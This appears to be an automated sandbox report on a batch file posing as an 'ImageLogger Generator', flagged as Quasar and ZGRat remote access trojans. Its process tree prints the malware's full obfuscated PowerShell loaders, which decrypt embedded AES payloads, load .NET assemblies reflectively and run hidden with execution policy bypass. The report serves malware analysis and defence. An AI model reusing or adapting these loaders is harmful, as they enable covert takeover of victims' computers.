Analysis
-
max time kernel
83s -
max time network
74s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
18-04-2024 22:43
General
-
Target
ImageLogger Generator v2.24.bat
-
Size
12.6MB
-
MD5
ae574bd7f7a0002bea0d461a4aa23623
-
SHA1
0aac1c4a7a864e6e45e6268f13872d401827f3b3
-
SHA256
095ee3bb8d267202e56a78f491cc580e358d20f63f8456fe12db424b2ddc010e
-
SHA512
289380180a7c6d4023edc0387100876159be69363cd87394527544922a8a0a0ba5a4cd89ee68ff88934e8c218f220220cbfc736e63fb1692e649217965e70cb9
-
SSDEEP
49152:/eVfbDQ8+28jjGs/uX0lNU3FdeYbrLpm11yPrq3DRKs806GX/2C5ErXlf7/XJaLh:n
Score
10/10
Malware Config
Extracted
Family
quasar
Attributes
-
reconnect_delay
3000
Signatures
-
Detect ZGRat V1 1 IoCs
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Executes dropped EXE 3 IoCs
-
Drops file in System32 directory 10 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 8 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
-
Suspicious behavior: LoadsDriver 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 58 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{385ad5f7-e41a-4ba2-9721-497f0acae318}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5755ce96-9886-4054-876e-3dc60dd994ec}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7ce933fe-37ca-4b26-90e7-4d843f71745d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ImageLogger Generator v2.24.bat"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\ImageLogger Generator v2.24.bat.exe"ImageLogger Generator v2.24.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function zzHSW($kxBws){ $gNrZA=[System.Security.Cryptography.Aes]::Create(); $gNrZA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $gNrZA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $gNrZA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UIn5UnQvAyZvWZwLhL7BJXBPTWUG6ZU14wToWb3eUe8='); $gNrZA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CT4vFWv4H7TodHsxiJxIEQ=='); $APAWR=$gNrZA.CreateDecryptor(); $return_var=$APAWR.TransformFinalBlock($kxBws, 0, $kxBws.Length); $APAWR.Dispose(); $gNrZA.Dispose(); $return_var;}function fFRzP($kxBws){ $dmUhd=New-Object System.IO.MemoryStream(,$kxBws); $wpWzN=New-Object System.IO.MemoryStream; $ebhzz=New-Object System.IO.Compression.GZipStream($dmUhd, [IO.Compression.CompressionMode]::Decompress); $ebhzz.CopyTo($wpWzN); $ebhzz.Dispose(); $dmUhd.Dispose(); $wpWzN.Dispose(); $wpWzN.ToArray();}function oPRKU($kxBws,$wKCvu){ $LmaIl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$kxBws); $WXzRY=$LmaIl.EntryPoint; $WXzRY.Invoke($null, $wKCvu);}$YOAWT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ImageLogger Generator v2.24.bat').Split([Environment]::NewLine);foreach ($ErMEV in $YOAWT) { if ($ErMEV.StartsWith('SEROXEN')) { $mlznx=$ErMEV.Substring(7); break; }}$gMdiT=[string[]]$mlznx.Split('\');$ZOzgr=fFRzP (zzHSW ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gMdiT[0])));$tyLfh=fFRzP (zzHSW ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gMdiT[1])));oPRKU $tyLfh (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));oPRKU $ZOzgr (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function iRWHH($DbkGR){ $ZidzX=[System.Security.Cryptography.Aes]::Create(); $ZidzX.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZidzX.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZidzX.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY='); $ZidzX.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg=='); $NOvKD=$ZidzX.('rotpyrceDetaerC'[-1..-15] -join '')(); $LpvlU=$NOvKD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkGR, 0, $DbkGR.Length); $NOvKD.Dispose(); $ZidzX.Dispose(); $LpvlU;}function bSTPW($DbkGR){ $syrXU=New-Object System.IO.MemoryStream(,$DbkGR); $mMvvp=New-Object System.IO.MemoryStream; $hleBr=New-Object System.IO.Compression.GZipStream($syrXU, [IO.Compression.CompressionMode]::Decompress); $hleBr.CopyTo($mMvvp); $hleBr.Dispose(); $syrXU.Dispose(); $mMvvp.Dispose(); $mMvvp.ToArray();}function qextD($DbkGR,$hjoik){ $ApsXV=[System.Reflection.Assembly]::Load([byte[]]$DbkGR); $ugFsZ=$ApsXV.EntryPoint; $ugFsZ.Invoke($null, $hjoik);}$ZidzX1 = New-Object System.Security.Cryptography.AesManaged;$ZidzX1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ZidzX1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ZidzX1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY=');$ZidzX1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg==');$IdaqQ = $ZidzX1.('rotpyrceDetaerC'[-1..-15] -join '')();$XWwvn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0EULzVg+9nIDESxJ7UQv9A==');$XWwvn = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn, 0, $XWwvn.Length);$XWwvn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn);$DTJsM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IafgMFZjQ7mHM+UCfJKBctGmlxpfhXl0XBUBJ7VCiw=');$DTJsM = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DTJsM, 0, $DTJsM.Length);$DTJsM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DTJsM);$NlKhP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iDSrRzkjAHmcGgxlvysosg==');$NlKhP = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NlKhP, 0, $NlKhP.Length);$NlKhP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NlKhP);$BdXHz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kRGdkB+UC23hPxi3NUC/HAayGBzq4G2mY1iQX38GajdWFNGwEa6I10DlBwXPZ/V09uZK0FIQngMxqNXU/EvgQoS+epYJs2r5jncX/7mPwOBER4lQu37TEyWaMyOgkRiZuFn3qQcfyHutzp1EyW1yC90Z5i/MWJf6UIY+SuqYFbkGm7/SFox0P20sbMjcJod9xznqnEjT9PE3UsAfdPuUrxysjrCz42XJvWEdGoG1vjD+X9msR2rCX3WS0erFE6DByOKdXk7heo2jMzZCF5Wb7/XcLvoqVAlQ5cOCyYqGKyxxVVfIWRcN2YxzMkzTpYAJK4F6rr7ZRgACqLee4Z8pdivu0gx43Fsn4thmm76mFzFOEYoo5KOW/c9auJaycDKop9Z/NnculVSgIDA8rkdncpiipmJ6s7e72eSsx0ckZ1U=');$BdXHz = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdXHz, 0, $BdXHz.Length);$BdXHz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdXHz);$gGpPA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ulPba6erJRx5g9rlHvHt5g==');$gGpPA = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gGpPA, 0, $gGpPA.Length);$gGpPA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gGpPA);$REKFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HZJ8QDs+VEksUX8Bcn2lSQ==');$REKFT = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($REKFT, 0, $REKFT.Length);$REKFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($REKFT);$PEJrG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FSRd8vmCShAS1ZYNw8FcFQ==');$PEJrG = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEJrG, 0, $PEJrG.Length);$PEJrG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEJrG);$PSZXq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IuXj7T2GO26QFqBvrg7kow==');$PSZXq = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PSZXq, 0, $PSZXq.Length);$PSZXq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PSZXq);$JsSUe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aHBVDWQ9zcTUn1ZG3CLh+Q==');$JsSUe = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JsSUe, 0, $JsSUe.Length);$JsSUe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JsSUe);$XWwvn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MGJEdXzrKLlQXl9DUkQYPw==');$XWwvn0 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn0, 0, $XWwvn0.Length);$XWwvn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn0);$XWwvn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vfWu2W/BoTklq7yOdi+J1A==');$XWwvn1 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn1, 0, $XWwvn1.Length);$XWwvn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn1);$XWwvn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MFyDmQbP5i+al1egvUTACA==');$XWwvn2 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn2, 0, $XWwvn2.Length);$XWwvn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn2);$XWwvn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rkkucNFFKDXwT0SqqiPEsg==');$XWwvn3 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn3, 0, $XWwvn3.Length);$XWwvn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn3);$IdaqQ.Dispose();$ZidzX1.Dispose();if (@(get-process -ea silentlycontinue $XWwvn3).count -gt 1) {exit};$wNzpd = [Microsoft.Win32.Registry]::$PSZXq.$PEJrG($XWwvn).$REKFT($DTJsM);$SIdLB=[string[]]$wNzpd.Split('\');$RyjBd=bSTPW(iRWHH([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SIdLB[1])));qextD $RyjBd (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$cBzNb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SIdLB[0]);$ZidzX = New-Object System.Security.Cryptography.AesManaged;$ZidzX.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ZidzX.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ZidzX.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY=');$ZidzX.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg==');$NOvKD = $ZidzX.('rotpyrceDetaerC'[-1..-15] -join '')();$cBzNb = $NOvKD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBzNb, 0, $cBzNb.Length);$NOvKD.Dispose();$ZidzX.Dispose();$syrXU = New-Object System.IO.MemoryStream(, $cBzNb);$mMvvp = New-Object System.IO.MemoryStream;$hleBr = New-Object System.IO.Compression.GZipStream($syrXU, [IO.Compression.CompressionMode]::$XWwvn1);$hleBr.$JsSUe($mMvvp);$hleBr.Dispose();$syrXU.Dispose();$mMvvp.Dispose();$cBzNb = $mMvvp.ToArray();$VCCxi = $BdXHz | IEX;$ApsXV = $VCCxi::$XWwvn2($cBzNb);$ugFsZ = $ApsXV.EntryPoint;$ugFsZ.$XWwvn0($null, (, [string[]] ($NlKhP)))3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1176).WaitForExit();[System.Threading.Thread]::Sleep(5000); function iRWHH($DbkGR){ $ZidzX=[System.Security.Cryptography.Aes]::Create(); $ZidzX.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZidzX.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZidzX.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY='); $ZidzX.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg=='); $NOvKD=$ZidzX.('rotpyrceDetaerC'[-1..-15] -join '')(); $LpvlU=$NOvKD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkGR, 0, $DbkGR.Length); $NOvKD.Dispose(); $ZidzX.Dispose(); $LpvlU;}function bSTPW($DbkGR){ $syrXU=New-Object System.IO.MemoryStream(,$DbkGR); $mMvvp=New-Object System.IO.MemoryStream; $hleBr=New-Object System.IO.Compression.GZipStream($syrXU, [IO.Compression.CompressionMode]::Decompress); $hleBr.CopyTo($mMvvp); $hleBr.Dispose(); $syrXU.Dispose(); $mMvvp.Dispose(); $mMvvp.ToArray();}function qextD($DbkGR,$hjoik){ $ApsXV=[System.Reflection.Assembly]::Load([byte[]]$DbkGR); $ugFsZ=$ApsXV.EntryPoint; $ugFsZ.Invoke($null, $hjoik);}$ZidzX1 = New-Object System.Security.Cryptography.AesManaged;$ZidzX1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ZidzX1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ZidzX1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY=');$ZidzX1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg==');$IdaqQ = $ZidzX1.('rotpyrceDetaerC'[-1..-15] -join '')();$XWwvn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0EULzVg+9nIDESxJ7UQv9A==');$XWwvn = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn, 0, $XWwvn.Length);$XWwvn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn);$DTJsM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IafgMFZjQ7mHM+UCfJKBctGmlxpfhXl0XBUBJ7VCiw=');$DTJsM = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DTJsM, 0, $DTJsM.Length);$DTJsM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DTJsM);$NlKhP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iDSrRzkjAHmcGgxlvysosg==');$NlKhP = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NlKhP, 0, $NlKhP.Length);$NlKhP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NlKhP);$BdXHz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kRGdkB+UC23hPxi3NUC/HAayGBzq4G2mY1iQX38GajdWFNGwEa6I10DlBwXPZ/V09uZK0FIQngMxqNXU/EvgQoS+epYJs2r5jncX/7mPwOBER4lQu37TEyWaMyOgkRiZuFn3qQcfyHutzp1EyW1yC90Z5i/MWJf6UIY+SuqYFbkGm7/SFox0P20sbMjcJod9xznqnEjT9PE3UsAfdPuUrxysjrCz42XJvWEdGoG1vjD+X9msR2rCX3WS0erFE6DByOKdXk7heo2jMzZCF5Wb7/XcLvoqVAlQ5cOCyYqGKyxxVVfIWRcN2YxzMkzTpYAJK4F6rr7ZRgACqLee4Z8pdivu0gx43Fsn4thmm76mFzFOEYoo5KOW/c9auJaycDKop9Z/NnculVSgIDA8rkdncpiipmJ6s7e72eSsx0ckZ1U=');$BdXHz = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdXHz, 0, $BdXHz.Length);$BdXHz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdXHz);$gGpPA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ulPba6erJRx5g9rlHvHt5g==');$gGpPA = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gGpPA, 0, $gGpPA.Length);$gGpPA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gGpPA);$REKFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HZJ8QDs+VEksUX8Bcn2lSQ==');$REKFT = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($REKFT, 0, $REKFT.Length);$REKFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($REKFT);$PEJrG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FSRd8vmCShAS1ZYNw8FcFQ==');$PEJrG = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEJrG, 0, $PEJrG.Length);$PEJrG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEJrG);$PSZXq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IuXj7T2GO26QFqBvrg7kow==');$PSZXq = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PSZXq, 0, $PSZXq.Length);$PSZXq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PSZXq);$JsSUe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aHBVDWQ9zcTUn1ZG3CLh+Q==');$JsSUe = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JsSUe, 0, $JsSUe.Length);$JsSUe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JsSUe);$XWwvn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MGJEdXzrKLlQXl9DUkQYPw==');$XWwvn0 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn0, 0, $XWwvn0.Length);$XWwvn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn0);$XWwvn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vfWu2W/BoTklq7yOdi+J1A==');$XWwvn1 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn1, 0, $XWwvn1.Length);$XWwvn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn1);$XWwvn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MFyDmQbP5i+al1egvUTACA==');$XWwvn2 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn2, 0, $XWwvn2.Length);$XWwvn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn2);$XWwvn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rkkucNFFKDXwT0SqqiPEsg==');$XWwvn3 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn3, 0, $XWwvn3.Length);$XWwvn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn3);$IdaqQ.Dispose();$ZidzX1.Dispose();if (@(get-process -ea silentlycontinue $XWwvn3).count -gt 1) {exit};$wNzpd = [Microsoft.Win32.Registry]::$PSZXq.$PEJrG($XWwvn).$REKFT($DTJsM);$SIdLB=[string[]]$wNzpd.Split('\');$RyjBd=bSTPW(iRWHH([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SIdLB[1])));qextD $RyjBd (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$cBzNb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SIdLB[0]);$ZidzX = New-Object System.Security.Cryptography.AesManaged;$ZidzX.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ZidzX.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ZidzX.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY=');$ZidzX.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg==');$NOvKD = $ZidzX.('rotpyrceDetaerC'[-1..-15] -join '')();$cBzNb = $NOvKD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBzNb, 0, $cBzNb.Length);$NOvKD.Dispose();$ZidzX.Dispose();$syrXU = New-Object System.IO.MemoryStream(, $cBzNb);$mMvvp = New-Object System.IO.MemoryStream;$hleBr = New-Object System.IO.Compression.GZipStream($syrXU, [IO.Compression.CompressionMode]::$XWwvn1);$hleBr.$JsSUe($mMvvp);$hleBr.Dispose();$syrXU.Dispose();$mMvvp.Dispose();$cBzNb = $mMvvp.ToArray();$VCCxi = $BdXHz | IEX;$ApsXV = $VCCxi::$XWwvn2($cBzNb);$ugFsZ = $ApsXV.EntryPoint;$ugFsZ.$XWwvn0($null, (, [string[]] ($NlKhP)))4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff80213ab58,0x7ff80213ab68,0x7ff80213ab782⤵
-
-
C:\Windows\system32\sihost.exesihost.exe1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.8MB
MD57873612dddd9152d70d892427bc45ef0
SHA1ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
